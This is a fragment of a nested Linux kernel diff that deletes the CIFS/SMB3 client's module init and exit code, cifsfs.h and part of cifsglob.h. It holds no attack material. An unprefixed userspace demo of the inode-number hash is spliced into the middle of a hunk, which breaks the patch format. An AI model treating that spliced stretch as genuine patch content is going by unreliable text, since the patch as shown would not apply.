+-					 WQ_FREEZABLE|WQ_MEM_RECLAIM, 0);
+-	if (!cifsoplockd_wq) {
+-		rc = -ENOMEM;
+-		goto out_destroy_fileinfo_put_wq;
+-	}
+-
+-	deferredclose_wq = alloc_workqueue("deferredclose",
+-					   WQ_FREEZABLE|WQ_MEM_RECLAIM, 0);
+-	if (!deferredclose_wq) {
+-		rc = -ENOMEM;
+-		goto out_destroy_cifsoplockd_wq;
+-	}
+-
+-	rc = cifs_init_inodecache();
+-	if (rc)
+-		goto out_destroy_deferredclose_wq;
+-
+-	rc = init_mids();
+-	if (rc)
+-		goto out_destroy_inodecache;
+-
+-	rc = cifs_init_request_bufs();
+-	if (rc)
+-		goto out_destroy_mids;
+-
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	rc = dfs_cache_init();
+-	if (rc)
+-		goto out_destroy_request_bufs;
+-#endif /* CONFIG_CIFS_DFS_UPCALL */
+-#ifdef CONFIG_CIFS_UPCALL
+-	rc = init_cifs_spnego();
+-	if (rc)
+-		goto out_destroy_dfs_cache;
+-#endif /* CONFIG_CIFS_UPCALL */
+-#ifdef CONFIG_CIFS_SWN_UPCALL
+-	rc = cifs_genl_init();
+-	if (rc)
+-		goto out_register_key_type;
+-#endif /* CONFIG_CIFS_SWN_UPCALL */
+-
+-	rc = init_cifs_idmap();
+-	if (rc)
+-		goto out_cifs_swn_init;
+-
+-	rc = register_filesystem(&cifs_fs_type);
+-	if (rc)
+-		goto out_init_cifs_idmap;
+-
+-	rc = register_filesystem(&smb3_fs_type);
+-	if (rc) {
+-		unregister_filesystem(&cifs_fs_type);
+-		goto out_init_cifs_idmap;
+-	}
+-
+-	return 0;
+-
+-out_init_cifs_idmap:
+-	exit_cifs_idmap();
+-out_cifs_swn_init:
+-#ifdef CONFIG_CIFS_SWN_UPCALL
+-	cifs_genl_exit();
+-out_register_key_type:
+-#endif
+-#ifdef CONFIG_CIFS_UPCALL
+-	exit_cifs_spnego();
+-out_destroy_dfs_cache:
+-#endif
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	dfs_cache_destroy();
+-out_destroy_request_bufs:
+-#endif
+-	cifs_destroy_request_bufs();
+-out_destroy_mids:
+-	destroy_mids();
+-out_destroy_inodecache:
+-	cifs_destroy_inodecache();
+-out_destroy_deferredclose_wq:
+-	destroy_workqueue(deferredclose_wq);
+-out_destroy_cifsoplockd_wq:
+-	destroy_workqueue(cifsoplockd_wq);
+-out_destroy_fileinfo_put_wq:
+-	destroy_workqueue(fileinfo_put_wq);
+-out_destroy_decrypt_wq:
+-	destroy_workqueue(decrypt_wq);
+-out_destroy_cifsiod_wq:
+-	destroy_workqueue(cifsiod_wq);
+-out_clean_proc:
+-	cifs_proc_clean();
+-	return rc;
+-}
+-
+-static void __exit
+-exit_cifs(void)
+-{
+-	cifs_dbg(NOISY, "exit_smb3\n");
+-	unregister_filesystem(&cifs_fs_type);
+-	unregister_filesystem(&smb3_fs_type);
+-	cifs_dfs_release_automount_timer();
+-	exit_cifs_idmap();
+-#ifdef CONFIG_CIFS_SWN_UPCALL
+-	cifs_genl_exit();
+-#endif
+-#ifdef CONFIG_CIFS_UPCALL
+-	exit_cifs_spnego();
+-#endif
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	dfs_cache_destroy();
+-#endif
+-	cifs_destroy_request_bufs();
+-	destroy_mids();
+-	cifs_destroy_inodecache();
+-	destroy_workqueue(deferredclose_wq);
+-	destroy_workqueue(cifsoplockd_wq);
+-	destroy_workqueue(decrypt_wq);
+-	destroy_workqueue(fileinfo_put_wq);
+-	destroy_workqueue(cifsiod_wq);
+-	cifs_proc_clean();
+-}
+-
+-MODULE_AUTHOR("Steve French");
+-MODULE_LICENSE("GPL");	/* combination of LGPL + GPL source behaves as GPL */
+-MODULE_DESCRIPTION
+-	("VFS to access SMB3 servers e.g. Samba, Macs, Azure and Windows (and "
+-	"also older servers complying with the SNIA CIFS Specification)");
+-MODULE_VERSION(CIFS_VERSION);
+-MODULE_SOFTDEP("ecb");
+-MODULE_SOFTDEP("hmac");
+-MODULE_SOFTDEP("md5");
+-MODULE_SOFTDEP("nls");
+-MODULE_SOFTDEP("aes");
+-MODULE_SOFTDEP("cmac");
+-MODULE_SOFTDEP("sha256");
+-MODULE_SOFTDEP("sha512");
+-MODULE_SOFTDEP("aead2");
+-MODULE_SOFTDEP("ccm");
+-MODULE_SOFTDEP("gcm");
+-module_init(init_cifs)
+-module_exit(exit_cifs)
+diff --git a/fs/cifs/cifsfs.h b/fs/cifs/cifsfs.h
+deleted file mode 100644
+index b6c38896fb2db..0000000000000
+--- a/fs/cifs/cifsfs.h
++++ /dev/null
+@@ -1,161 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-/*
+- *
+- *   Copyright (c) International Business Machines  Corp., 2002, 2007
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-
+-#ifndef _CIFSFS_H
+-#define _CIFSFS_H
+-
+-#include <linux/hash.h>
+-
+-#define ROOT_I 2
+-
+-/*
+- * ino_t is 32 bits on a 32-bit arch. We have to squash the 64-bit value down
+- * so that it will fit. We use hash_64 to convert the value to 31 bits, and
+- * then add 1, to ensure that we don't end up with a 0 as the value.
+- */
+-static inline ino_t
+-cifs_uniqueid_to_ino_t(u64 fileid)
+-{
+-	if ((sizeof(ino_t)) < (sizeof(u64)))
+-		return (ino_t)hash_64(fileid, (sizeof(ino_t) * 8) - 1) + 1;
+-
+-	return (ino_t)fileid;
+-
+-}
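
/*
 * A userspace sketch of the squash above, assuming hash_64() is the
 * multiplicative hash from include/linux/hash.h,
 * (val * GOLDEN_RATIO_64) >> (64 - bits); hypothetical demo code, not
 * part of the patch.
 */
#include <stdint.h>
#include <stdio.h>

#define GOLDEN_RATIO_64 0x61C8864680B583EBull

static uint32_t squash_fileid_to_ino(uint64_t fileid)
{
	/* hash down to 31 bits, then add 1 so we never return 0 */
	return (uint32_t)((fileid * GOLDEN_RATIO_64) >> (64 - 31)) + 1;
}

int main(void)
{
	printf("%u\n", squash_fileid_to_ino(0x0123456789abcdefULL));
	return 0;
}
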
+-
+-static inline void cifs_set_time(struct dentry *dentry, unsigned long time)
+-{
+-	dentry->d_fsdata = (void *) time;
+-}
+-
+-static inline unsigned long cifs_get_time(struct dentry *dentry)
+-{
+-	return (unsigned long) dentry->d_fsdata;
+-}
+-
+-extern struct file_system_type cifs_fs_type, smb3_fs_type;
+-extern const struct address_space_operations cifs_addr_ops;
+-extern const struct address_space_operations cifs_addr_ops_smallbuf;
+-
+-/* Functions related to super block operations */
+-extern void cifs_sb_active(struct super_block *sb);
+-extern void cifs_sb_deactive(struct super_block *sb);
+-
+-/* Functions related to inodes */
+-extern const struct inode_operations cifs_dir_inode_ops;
+-extern struct inode *cifs_root_iget(struct super_block *);
+-extern int cifs_create(struct user_namespace *, struct inode *,
+-		       struct dentry *, umode_t, bool excl);
+-extern int cifs_atomic_open(struct inode *, struct dentry *,
+-			    struct file *, unsigned, umode_t);
+-extern struct dentry *cifs_lookup(struct inode *, struct dentry *,
+-				  unsigned int);
+-extern int cifs_unlink(struct inode *dir, struct dentry *dentry);
+-extern int cifs_hardlink(struct dentry *, struct inode *, struct dentry *);
+-extern int cifs_mknod(struct user_namespace *, struct inode *, struct dentry *,
+-		      umode_t, dev_t);
+-extern int cifs_mkdir(struct user_namespace *, struct inode *, struct dentry *,
+-		      umode_t);
+-extern int cifs_rmdir(struct inode *, struct dentry *);
+-extern int cifs_rename2(struct user_namespace *, struct inode *,
+-			struct dentry *, struct inode *, struct dentry *,
+-			unsigned int);
+-extern int cifs_revalidate_file_attr(struct file *filp);
+-extern int cifs_revalidate_dentry_attr(struct dentry *);
+-extern int cifs_revalidate_file(struct file *filp);
+-extern int cifs_revalidate_dentry(struct dentry *);
+-extern int cifs_invalidate_mapping(struct inode *inode);
+-extern int cifs_revalidate_mapping(struct inode *inode);
+-extern int cifs_zap_mapping(struct inode *inode);
+-extern int cifs_getattr(struct user_namespace *, const struct path *,
+-			struct kstat *, u32, unsigned int);
+-extern int cifs_setattr(struct user_namespace *, struct dentry *,
+-			struct iattr *);
+-extern int cifs_fiemap(struct inode *, struct fiemap_extent_info *, u64 start,
+-		       u64 len);
+-
+-extern const struct inode_operations cifs_file_inode_ops;
+-extern const struct inode_operations cifs_symlink_inode_ops;
+-extern const struct inode_operations cifs_dfs_referral_inode_operations;
+-
+-
+-/* Functions related to files and directories */
+-extern const struct file_operations cifs_file_ops;
+-extern const struct file_operations cifs_file_direct_ops; /* if directio mnt */
+-extern const struct file_operations cifs_file_strict_ops; /* if strictio mnt */
+-extern const struct file_operations cifs_file_nobrl_ops; /* no brlocks */
+-extern const struct file_operations cifs_file_direct_nobrl_ops;
+-extern const struct file_operations cifs_file_strict_nobrl_ops;
+-extern int cifs_open(struct inode *inode, struct file *file);
+-extern int cifs_close(struct inode *inode, struct file *file);
+-extern int cifs_closedir(struct inode *inode, struct file *file);
+-extern ssize_t cifs_user_readv(struct kiocb *iocb, struct iov_iter *to);
+-extern ssize_t cifs_direct_readv(struct kiocb *iocb, struct iov_iter *to);
+-extern ssize_t cifs_strict_readv(struct kiocb *iocb, struct iov_iter *to);
+-extern ssize_t cifs_user_writev(struct kiocb *iocb, struct iov_iter *from);
+-extern ssize_t cifs_direct_writev(struct kiocb *iocb, struct iov_iter *from);
+-extern ssize_t cifs_strict_writev(struct kiocb *iocb, struct iov_iter *from);
+-extern int cifs_flock(struct file *pfile, int cmd, struct file_lock *plock);
+-extern int cifs_lock(struct file *, int, struct file_lock *);
+-extern int cifs_fsync(struct file *, loff_t, loff_t, int);
+-extern int cifs_strict_fsync(struct file *, loff_t, loff_t, int);
+-extern int cifs_flush(struct file *, fl_owner_t id);
+-extern int cifs_file_mmap(struct file * , struct vm_area_struct *);
+-extern int cifs_file_strict_mmap(struct file * , struct vm_area_struct *);
+-extern const struct file_operations cifs_dir_ops;
+-extern int cifs_dir_open(struct inode *inode, struct file *file);
+-extern int cifs_readdir(struct file *file, struct dir_context *ctx);
+-
+-/* Functions related to dir entries */
+-extern const struct dentry_operations cifs_dentry_ops;
+-extern const struct dentry_operations cifs_ci_dentry_ops;
+-
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-extern struct vfsmount *cifs_dfs_d_automount(struct path *path);
+-#else
+-static inline struct vfsmount *cifs_dfs_d_automount(struct path *path)
+-{
+-	return ERR_PTR(-EREMOTE);
+-}
+-#endif
+-
+-/* Functions related to symlinks */
+-extern const char *cifs_get_link(struct dentry *, struct inode *,
+-			struct delayed_call *);
+-extern int cifs_symlink(struct user_namespace *mnt_userns, struct inode *inode,
+-			struct dentry *direntry, const char *symname);
+-
+-#ifdef CONFIG_CIFS_XATTR
+-extern const struct xattr_handler *cifs_xattr_handlers[];
+-extern ssize_t	cifs_listxattr(struct dentry *, char *, size_t);
+-#else
+-# define cifs_xattr_handlers NULL
+-# define cifs_listxattr NULL
+-#endif
+-
+-extern ssize_t cifs_file_copychunk_range(unsigned int xid,
+-					struct file *src_file, loff_t off,
+-					struct file *dst_file, loff_t destoff,
+-					size_t len, unsigned int flags);
+-
+-extern long cifs_ioctl(struct file *filep, unsigned int cmd, unsigned long arg);
+-extern void cifs_setsize(struct inode *inode, loff_t offset);
+-extern int cifs_truncate_page(struct address_space *mapping, loff_t from);
+-
+-struct smb3_fs_context;
+-extern struct dentry *cifs_smb3_do_mount(struct file_system_type *fs_type,
+-					 int flags, struct smb3_fs_context *ctx);
+-
+-#ifdef CONFIG_CIFS_NFSD_EXPORT
+-extern const struct export_operations cifs_export_ops;
+-#endif /* CONFIG_CIFS_NFSD_EXPORT */
+-
+-/* when changing the internal version, update the following two lines at the same time */
+-#define SMB3_PRODUCT_BUILD 40
+-#define CIFS_VERSION   "2.40"
+-#endif				/* _CIFSFS_H */
+diff --git a/fs/cifs/cifsglob.h b/fs/cifs/cifsglob.h
+deleted file mode 100644
+index 6ec1a34738e27..0000000000000
+--- a/fs/cifs/cifsglob.h
++++ /dev/null
+@@ -1,2208 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-/*
+- *
+- *   Copyright (C) International Business Machines  Corp., 2002,2008
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *              Jeremy Allison (jra@samba.org)
+- *
+- */
+-#ifndef _CIFS_GLOB_H
+-#define _CIFS_GLOB_H
+-
+-#include <linux/in.h>
+-#include <linux/in6.h>
+-#include <linux/inet.h>
+-#include <linux/slab.h>
+-#include <linux/scatterlist.h>
+-#include <linux/mm.h>
+-#include <linux/mempool.h>
+-#include <linux/workqueue.h>
+-#include <linux/utsname.h>
+-#include <linux/sched/mm.h>
+-#include <linux/netfs.h>
+-#include "cifs_fs_sb.h"
+-#include "cifsacl.h"
+-#include <crypto/internal/hash.h>
+-#include <linux/scatterlist.h>
+-#include <uapi/linux/cifs/cifs_mount.h>
+-#include "../smbfs_common/smb2pdu.h"
+-#include "smb2pdu.h"
+-
+-#define SMB_PATH_MAX 260
+-#define CIFS_PORT 445
+-#define RFC1001_PORT 139
+-
+-/*
+- * The sizes of various internal tables and strings
+- */
+-#define MAX_UID_INFO 16
+-#define MAX_SES_INFO 2
+-#define MAX_TCON_INFO 4
+-
+-#define MAX_TREE_SIZE (2 + CIFS_NI_MAXHOST + 1 + CIFS_MAX_SHARE_LEN + 1)
+-
+-#define CIFS_MIN_RCV_POOL 4
+-
+-#define MAX_REOPEN_ATT	5 /* maximum number of attempts to reopen a file */
+-/*
+- * default attribute cache timeout (jiffies)
+- */
+-#define CIFS_DEF_ACTIMEO (1 * HZ)
+-
+-/*
+- * max attribute cache timeout (jiffies) - 2^30
+- */
+-#define CIFS_MAX_ACTIMEO (1 << 30)
+-
+-/*
+- * Max persistent and resilient handle timeout (milliseconds).
+- * Windows durable max was 960000 (16 minutes)
+- */
+-#define SMB3_MAX_HANDLE_TIMEOUT 960000
+-
+-/*
+- * MAX_REQ is the maximum number of requests that WE will send
+- * on one socket concurrently.
+- */
+-#define CIFS_MAX_REQ 32767
+-
+-#define RFC1001_NAME_LEN 15
+-#define RFC1001_NAME_LEN_WITH_NULL (RFC1001_NAME_LEN + 1)
+-
+-/* maximum length of ip addr as a string (including ipv6 and sctp) */
+-#define SERVER_NAME_LENGTH 80
+-#define SERVER_NAME_LEN_WITH_NULL     (SERVER_NAME_LENGTH + 1)
+-
+-/* echo interval in seconds */
+-#define SMB_ECHO_INTERVAL_MIN 1
+-#define SMB_ECHO_INTERVAL_MAX 600
+-#define SMB_ECHO_INTERVAL_DEFAULT 60
+-
+-/* dns resolution intervals in seconds */
+-#define SMB_DNS_RESOLVE_INTERVAL_MIN     120
+-#define SMB_DNS_RESOLVE_INTERVAL_DEFAULT 600
+-
+-/* smb multichannel query server interfaces interval in seconds */
+-#define SMB_INTERFACE_POLL_INTERVAL	600
+-
+-/* maximum number of PDUs in one compound */
+-#define MAX_COMPOUND 5
+-
+-/*
+- * Default number of credits to keep available for SMB3.
+- * This value is chosen somewhat arbitrarily. The Windows client
+- * defaults to 128 credits, the Windows server allows clients up to
+- * 512 credits (or 8K for later versions), and the NetApp server
+- * does not limit clients at all.  Choose a high enough default value
+- * such that the client shouldn't limit performance, but allow mount
+- * to override it (until you approach 64K, where we limit credits to
+- * 65000 to reduce the possibility of seeing more server credit
+- * overflow bugs).
+- */
+-#define SMB2_MAX_CREDITS_AVAILABLE 32000
+-
+-#include "cifspdu.h"
+-
+-#ifndef XATTR_DOS_ATTRIB
+-#define XATTR_DOS_ATTRIB "user.DOSATTRIB"
+-#endif
+-
+-#define CIFS_MAX_WORKSTATION_LEN  (__NEW_UTS_LEN + 1)  /* reasonable max for client */
+-
+-/*
+- * CIFS vfs client Status information (based on what we know.)
+- */
+-
+-/* associated with each connection */
+-enum statusEnum {
+-	CifsNew = 0,
+-	CifsGood,
+-	CifsExiting,
+-	CifsNeedReconnect,
+-	CifsNeedNegotiate,
+-	CifsInNegotiate,
+-};
+-
+-/* associated with each smb session */
+-enum ses_status_enum {
+-	SES_NEW = 0,
+-	SES_GOOD,
+-	SES_EXITING,
+-	SES_NEED_RECON,
+-	SES_IN_SETUP
+-};
+-
+-/* associated with each tree connection to the server */
+-enum tid_status_enum {
+-	TID_NEW = 0,
+-	TID_GOOD,
+-	TID_EXITING,
+-	TID_NEED_RECON,
+-	TID_NEED_TCON,
+-	TID_IN_TCON,
+-	TID_NEED_FILES_INVALIDATE, /* currently unused */
+-	TID_IN_FILES_INVALIDATE
+-};
+-
+-enum securityEnum {
+-	Unspecified = 0,	/* not specified */
+-	NTLMv2,			/* Legacy NTLM auth with NTLMv2 hash */
+-	RawNTLMSSP,		/* NTLMSSP without SPNEGO, NTLMv2 hash */
+-	Kerberos,		/* Kerberos via SPNEGO */
+-};
+-
+-struct session_key {
+-	unsigned int len;
+-	char *response;
+-};
+-
+-/* crypto hashing related structure/fields, not specific to a sec mech */
+-struct cifs_secmech {
+-	struct shash_desc *hmacmd5; /* hmacmd5 hash function, for NTLMv2/CR1 hashes */
+-	struct shash_desc *md5; /* md5 hash function, for CIFS/SMB1 signatures */
+-	struct shash_desc *hmacsha256; /* hmac-sha256 hash function, for SMB2 signatures */
+-	struct shash_desc *sha512; /* sha512 hash function, for SMB3.1.1 preauth hash */
+-	struct shash_desc *aes_cmac; /* block-cipher based MAC function, for SMB3 signatures */
+-
+-	struct crypto_aead *enc; /* smb3 encryption AEAD TFM (AES-CCM and AES-GCM) */
+-	struct crypto_aead *dec; /* smb3 decryption AEAD TFM (AES-CCM and AES-GCM) */
+-};
+-
+-/* per smb session structure/fields */
+-struct ntlmssp_auth {
+-	bool sesskey_per_smbsess; /* whether session key is per smb session */
+-	__u32 client_flags; /* sent by client in type 1 ntlmssp exchange */
+-	__u32 server_flags; /* sent by server in type 2 ntlmssp exchange */
+-	unsigned char ciphertext[CIFS_CPHTXT_SIZE]; /* sent to server */
+-	char cryptkey[CIFS_CRYPTO_KEY_SIZE]; /* used by ntlmssp */
+-};
+-
+-struct cifs_cred {
+-	int uid;
+-	int gid;
+-	int mode;
+-	int cecount;
+-	struct cifs_sid osid;
+-	struct cifs_sid gsid;
+-	struct cifs_ntace *ntaces;
+-	struct cifs_ace *aces;
+-};
+-
+-struct cifs_open_info_data {
+-	char *symlink_target;
+-	union {
+-		struct smb2_file_all_info fi;
+-		struct smb311_posix_qinfo posix_fi;
+-	};
+-};
+-
+-static inline void cifs_free_open_info(struct cifs_open_info_data *data)
+-{
+-	kfree(data->symlink_target);
+-}
+-
+-/*
+- *****************************************************************
+- * Except the CIFS PDUs themselves all the
+- * globally interesting structs should go here
+- *****************************************************************
+- */
+-
+-/*
+- * A smb_rqst represents a complete request to be issued to a server. It's
+- * formed by a kvec array, followed by an array of pages. Page data is assumed
+- * to start at the beginning of the first page.
+- */
+-struct smb_rqst {
+-	struct kvec	*rq_iov;	/* array of kvecs */
+-	unsigned int	rq_nvec;	/* number of kvecs in array */
+-	struct page	**rq_pages;	/* pointer to array of page ptrs */
+-	unsigned int	rq_offset;	/* the offset to the 1st page */
+-	unsigned int	rq_npages;	/* number pages in array */
+-	unsigned int	rq_pagesz;	/* page size to use */
+-	unsigned int	rq_tailsz;	/* length of last page */
+-};
+-
+-struct mid_q_entry;
+-struct TCP_Server_Info;
+-struct cifsFileInfo;
+-struct cifs_ses;
+-struct cifs_tcon;
+-struct dfs_info3_param;
+-struct cifs_fattr;
+-struct smb3_fs_context;
+-struct cifs_fid;
+-struct cifs_readdata;
+-struct cifs_writedata;
+-struct cifs_io_parms;
+-struct cifs_search_info;
+-struct cifsInodeInfo;
+-struct cifs_open_parms;
+-struct cifs_credits;
+-
+-struct smb_version_operations {
+-	int (*send_cancel)(struct TCP_Server_Info *, struct smb_rqst *,
+-			   struct mid_q_entry *);
+-	bool (*compare_fids)(struct cifsFileInfo *, struct cifsFileInfo *);
+-	/* setup request: allocate mid, sign message */
+-	struct mid_q_entry *(*setup_request)(struct cifs_ses *,
+-					     struct TCP_Server_Info *,
+-					     struct smb_rqst *);
+-	/* setup async request: allocate mid, sign message */
+-	struct mid_q_entry *(*setup_async_request)(struct TCP_Server_Info *,
+-						struct smb_rqst *);
+-	/* check response: verify signature, map error */
+-	int (*check_receive)(struct mid_q_entry *, struct TCP_Server_Info *,
+-			     bool);
+-	void (*add_credits)(struct TCP_Server_Info *server,
+-			    const struct cifs_credits *credits,
+-			    const int optype);
+-	void (*set_credits)(struct TCP_Server_Info *, const int);
+-	int * (*get_credits_field)(struct TCP_Server_Info *, const int);
+-	unsigned int (*get_credits)(struct mid_q_entry *);
+-	__u64 (*get_next_mid)(struct TCP_Server_Info *);
+-	void (*revert_current_mid)(struct TCP_Server_Info *server,
+-				   const unsigned int val);
+-	/* data offset from read response message */
+-	unsigned int (*read_data_offset)(char *);
+-	/*
+-	 * Data length from read response message
+-	 * When in_remaining is true, the returned data length is in
+-	 * message field DataRemaining for out-of-band data read (e.g through
+-	 * Memory Registration RDMA write in SMBD).
+-	 * Otherwise, the returned data length is in message field DataLength.
+-	 */
+-	unsigned int (*read_data_length)(char *, bool in_remaining);
+-	/* map smb to linux error */
+-	int (*map_error)(char *, bool);
+-	/* find mid corresponding to the response message */
+-	struct mid_q_entry * (*find_mid)(struct TCP_Server_Info *, char *);
+-	void (*dump_detail)(void *buf, struct TCP_Server_Info *ptcp_info);
+-	void (*clear_stats)(struct cifs_tcon *);
+-	void (*print_stats)(struct seq_file *m, struct cifs_tcon *);
+-	void (*dump_share_caps)(struct seq_file *, struct cifs_tcon *);
+-	/* verify the message */
+-	int (*check_message)(char *, unsigned int, struct TCP_Server_Info *);
+-	bool (*is_oplock_break)(char *, struct TCP_Server_Info *);
+-	int (*handle_cancelled_mid)(struct mid_q_entry *, struct TCP_Server_Info *);
+-	void (*downgrade_oplock)(struct TCP_Server_Info *server,
+-				 struct cifsInodeInfo *cinode, __u32 oplock,
+-				 unsigned int epoch, bool *purge_cache);
+-	/* process transaction2 response */
+-	bool (*check_trans2)(struct mid_q_entry *, struct TCP_Server_Info *,
+-			     char *, int);
+-	/* check if we need to negotiate */
+-	bool (*need_neg)(struct TCP_Server_Info *);
+-	/* negotiate to the server */
+-	int (*negotiate)(const unsigned int xid,
+-			 struct cifs_ses *ses,
+-			 struct TCP_Server_Info *server);
+-	/* set negotiated write size */
+-	unsigned int (*negotiate_wsize)(struct cifs_tcon *tcon, struct smb3_fs_context *ctx);
+-	/* set negotiated read size */
+-	unsigned int (*negotiate_rsize)(struct cifs_tcon *tcon, struct smb3_fs_context *ctx);
+-	/* setup smb session */
+-	int (*sess_setup)(const unsigned int, struct cifs_ses *,
+-			  struct TCP_Server_Info *server,
+-			  const struct nls_table *);
+-	/* close smb session */
+-	int (*logoff)(const unsigned int, struct cifs_ses *);
+-	/* connect to a server share */
+-	int (*tree_connect)(const unsigned int, struct cifs_ses *, const char *,
+-			    struct cifs_tcon *, const struct nls_table *);
+-	/* close tree connection */
+-	int (*tree_disconnect)(const unsigned int, struct cifs_tcon *);
+-	/* get DFS referrals */
+-	int (*get_dfs_refer)(const unsigned int, struct cifs_ses *,
+-			     const char *, struct dfs_info3_param **,
+-			     unsigned int *, const struct nls_table *, int);
+-	/* informational QFS call */
+-	void (*qfs_tcon)(const unsigned int, struct cifs_tcon *,
+-			 struct cifs_sb_info *);
+-	/* check if a path is accessible or not */
+-	int (*is_path_accessible)(const unsigned int, struct cifs_tcon *,
+-				  struct cifs_sb_info *, const char *);
+-	/* query path data from the server */
+-	int (*query_path_info)(const unsigned int xid, struct cifs_tcon *tcon,
+-			       struct cifs_sb_info *cifs_sb, const char *full_path,
+-			       struct cifs_open_info_data *data, bool *adjust_tz, bool *reparse);
+-	/* query file data from the server */
+-	int (*query_file_info)(const unsigned int xid, struct cifs_tcon *tcon,
+-			       struct cifsFileInfo *cfile, struct cifs_open_info_data *data);
+-	/* query reparse tag from srv to determine which type of special file */
+-	int (*query_reparse_tag)(const unsigned int xid, struct cifs_tcon *tcon,
+-				struct cifs_sb_info *cifs_sb, const char *path,
+-				__u32 *reparse_tag);
+-	/* get server index number */
+-	int (*get_srv_inum)(const unsigned int xid, struct cifs_tcon *tcon,
+-			    struct cifs_sb_info *cifs_sb, const char *full_path, u64 *uniqueid,
+-			    struct cifs_open_info_data *data);
+-	/* set size by path */
+-	int (*set_path_size)(const unsigned int, struct cifs_tcon *,
+-			     const char *, __u64, struct cifs_sb_info *, bool);
+-	/* set size by file handle */
+-	int (*set_file_size)(const unsigned int, struct cifs_tcon *,
+-			     struct cifsFileInfo *, __u64, bool);
+-	/* set attributes */
+-	int (*set_file_info)(struct inode *, const char *, FILE_BASIC_INFO *,
+-			     const unsigned int);
+-	int (*set_compression)(const unsigned int, struct cifs_tcon *,
+-			       struct cifsFileInfo *);
+-	/* check if we can send an echo or not */
+-	bool (*can_echo)(struct TCP_Server_Info *);
+-	/* send echo request */
+-	int (*echo)(struct TCP_Server_Info *);
+-	/* create directory */
+-	int (*posix_mkdir)(const unsigned int xid, struct inode *inode,
+-			umode_t mode, struct cifs_tcon *tcon,
+-			const char *full_path,
+-			struct cifs_sb_info *cifs_sb);
+-	int (*mkdir)(const unsigned int xid, struct inode *inode, umode_t mode,
+-		     struct cifs_tcon *tcon, const char *name,
+-		     struct cifs_sb_info *sb);
+-	/* set info on created directory */
+-	void (*mkdir_setinfo)(struct inode *, const char *,
+-			      struct cifs_sb_info *, struct cifs_tcon *,
+-			      const unsigned int);
+-	/* remove directory */
+-	int (*rmdir)(const unsigned int, struct cifs_tcon *, const char *,
+-		     struct cifs_sb_info *);
+-	/* unlink file */
+-	int (*unlink)(const unsigned int, struct cifs_tcon *, const char *,
+-		      struct cifs_sb_info *);
+-	/* open, rename and delete file */
+-	int (*rename_pending_delete)(const char *, struct dentry *,
+-				     const unsigned int);
+-	/* send rename request */
+-	int (*rename)(const unsigned int, struct cifs_tcon *, const char *,
+-		      const char *, struct cifs_sb_info *);
+-	/* send create hardlink request */
+-	int (*create_hardlink)(const unsigned int, struct cifs_tcon *,
+-			       const char *, const char *,
+-			       struct cifs_sb_info *);
+-	/* query symlink target */
+-	int (*query_symlink)(const unsigned int, struct cifs_tcon *,
+-			     struct cifs_sb_info *, const char *,
+-			     char **, bool);
+-	/* open a file for non-posix mounts */
+-	int (*open)(const unsigned int xid, struct cifs_open_parms *oparms, __u32 *oplock,
+-		    void *buf);
+-	/* set fid protocol-specific info */
+-	void (*set_fid)(struct cifsFileInfo *, struct cifs_fid *, __u32);
+-	/* close a file */
+-	void (*close)(const unsigned int, struct cifs_tcon *,
+-		      struct cifs_fid *);
+-	/* close a file, returning file attributes and timestamps */
+-	void (*close_getattr)(const unsigned int xid, struct cifs_tcon *tcon,
+-		      struct cifsFileInfo *pfile_info);
+-	/* send a flush request to the server */
+-	int (*flush)(const unsigned int, struct cifs_tcon *, struct cifs_fid *);
+-	/* async read from the server */
+-	int (*async_readv)(struct cifs_readdata *);
+-	/* async write to the server */
+-	int (*async_writev)(struct cifs_writedata *,
+-			    void (*release)(struct kref *));
+-	/* sync read from the server */
+-	int (*sync_read)(const unsigned int, struct cifs_fid *,
+-			 struct cifs_io_parms *, unsigned int *, char **,
+-			 int *);
+-	/* sync write to the server */
+-	int (*sync_write)(const unsigned int, struct cifs_fid *,
+-			  struct cifs_io_parms *, unsigned int *, struct kvec *,
+-			  unsigned long);
+-	/* open dir, start readdir */
+-	int (*query_dir_first)(const unsigned int, struct cifs_tcon *,
+-			       const char *, struct cifs_sb_info *,
+-			       struct cifs_fid *, __u16,
+-			       struct cifs_search_info *);
+-	/* continue readdir */
+-	int (*query_dir_next)(const unsigned int, struct cifs_tcon *,
+-			      struct cifs_fid *,
+-			      __u16, struct cifs_search_info *srch_inf);
+-	/* close dir */
+-	int (*close_dir)(const unsigned int, struct cifs_tcon *,
+-			 struct cifs_fid *);
+-	/* calculate the size of an SMB message */
+-	unsigned int (*calc_smb_size)(void *buf);
+-	/* check for STATUS_PENDING and process the response if yes */
+-	bool (*is_status_pending)(char *buf, struct TCP_Server_Info *server);
+-	/* check for STATUS_NETWORK_SESSION_EXPIRED */
+-	bool (*is_session_expired)(char *);
+-	/* send oplock break response */
+-	int (*oplock_response)(struct cifs_tcon *tcon, __u64 persistent_fid, __u64 volatile_fid,
+-			__u16 net_fid, struct cifsInodeInfo *cifs_inode);
+-	/* query remote filesystem */
+-	int (*queryfs)(const unsigned int, struct cifs_tcon *,
+-		       struct cifs_sb_info *, struct kstatfs *);
+-	/* send mandatory brlock to the server */
+-	int (*mand_lock)(const unsigned int, struct cifsFileInfo *, __u64,
+-			 __u64, __u32, int, int, bool);
+-	/* unlock range of mandatory locks */
+-	int (*mand_unlock_range)(struct cifsFileInfo *, struct file_lock *,
+-				 const unsigned int);
+-	/* push brlocks from the cache to the server */
+-	int (*push_mand_locks)(struct cifsFileInfo *);
+-	/* get lease key of the inode */
+-	void (*get_lease_key)(struct inode *, struct cifs_fid *);
+-	/* set lease key of the inode */
+-	void (*set_lease_key)(struct inode *, struct cifs_fid *);
+-	/* generate new lease key */
+-	void (*new_lease_key)(struct cifs_fid *);
+-	int (*generate_signingkey)(struct cifs_ses *ses,
+-				   struct TCP_Server_Info *server);
+-	int (*calc_signature)(struct smb_rqst *, struct TCP_Server_Info *,
+-				bool allocate_crypto);
+-	int (*set_integrity)(const unsigned int, struct cifs_tcon *tcon,
+-			     struct cifsFileInfo *src_file);
+-	int (*enum_snapshots)(const unsigned int xid, struct cifs_tcon *tcon,
+-			     struct cifsFileInfo *src_file, void __user *);
+-	int (*notify)(const unsigned int xid, struct file *pfile,
+-			     void __user *pbuf, bool return_changes);
